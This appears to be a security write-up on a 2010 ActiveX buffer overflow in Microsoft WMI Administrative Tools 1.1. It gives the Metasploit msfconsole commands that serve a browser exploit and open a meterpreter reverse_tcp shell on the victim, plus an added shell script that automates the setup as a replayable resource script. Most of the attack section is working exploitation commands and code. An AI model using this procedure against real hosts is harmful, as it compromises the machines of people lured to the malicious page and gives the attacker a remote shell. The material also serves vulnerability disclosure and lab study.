Microsoft WMI Administration Tools ActiveX Buffer Overflow

Timeline :

Vulnerability & PoC disclosed by WooYun on 2010-12-22
Metasploit PoC provided on 2010-12-22

    PoC provided by :

WooYun
MC
jduck

    Reference(s) :

CVE-2010-3973
CVE-2010-4588

    Affected version(s) :

Microsoft WMI Administrative Tools 1.1

    Tested on Windows XP SP3

    Description :

On 22 December 2010, WooYun, a security researcher, disclosed a vulnerability, accompanied by a PoC, in WMI Administrative Tools 1.1. These tools are not included by default in Microsoft Windows and have to be installed separately on Windows XP, so only hosts where the package is present are exposed. The same day, the Metasploit team released a module to industrialize the exploitation of this vulnerability. The module is a browser exploit (exploit/windows/browser/wmi_admintools): the target only has to visit the page served by the module with a browser that can instantiate the vulnerable ActiveX control. This vulnerability is identified by CVE-2010-3973 and CVE-2010-4588. At the time of writing, Microsoft has not announced a patch.

    Commands :

use exploit/windows/browser/wmi_admintools
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1

sysinfo
ipconfig
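The msfconsole commands above, turned into a Metasploit resource script so the setup can be replayed with a single `msfconsole -q -r wmi_admintools.rc`. This is an added example, not code from the original post or from the Metasploit module; it assumes msfconsole is on PATH and uses the module and option names quoted above. `set URIPATH /` and `exploit -j -z` (run the server as a background job, do not auto-interact with the session) are my own additions; `sessions -i 1` is still typed by hand once a target has browsed to the page.

```shell
#!/bin/sh
# Added example (not from the original post): generate a Metasploit resource
# script for the wmi_admintools browser exploit. Usage:
#   ./gen_rc.sh 192.168.178.21            # SRVHOST defaults to LHOST
#   ./gen_rc.sh 192.168.178.21 10.0.0.5   # separate LHOST and SRVHOST
# then:  msfconsole -q -r wmi_admintools.rc
# Assumes msfconsole is on PATH; URIPATH and the -j/-z flags are assumptions.

# Return 0 if $1 is a dotted-quad IPv4 address with octets in 0..255, else 1.
is_ipv4() {
    case "$1" in
        *[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    old_ifs=$IFS; IFS=.
    set -- $1
    IFS=$old_ifs
    [ $# -eq 4 ] || return 1
    for octet; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Print the resource script to stdout.
#   $1 = LHOST   (address the meterpreter reverse_tcp payload connects back to)
#   $2 = SRVHOST (address the malicious web server binds to; defaults to $1)
build_rc() {
    lhost=$1
    srvhost=${2:-$1}
    is_ipv4 "$lhost"   || { echo "build_rc: bad LHOST '$lhost'" >&2;     return 1; }
    is_ipv4 "$srvhost" || { echo "build_rc: bad SRVHOST '$srvhost'" >&2; return 1; }
    cat <<EOF
use exploit/windows/browser/wmi_admintools
set SRVHOST $srvhost
set URIPATH /
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
exploit -j -z
EOF
}

# When invoked with an address, write the script next to us; with no
# arguments only the functions above are defined.
if [ $# -ge 1 ]; then
    build_rc "$1" "${2:-}" > wmi_admintools.rc && echo "wrote wmi_admintools.rc"
fi
```

After the target's browser loads the page, `sessions -l` lists the new meterpreter session and `sessions -i 1` drops into it, exactly as in the interactive procedure.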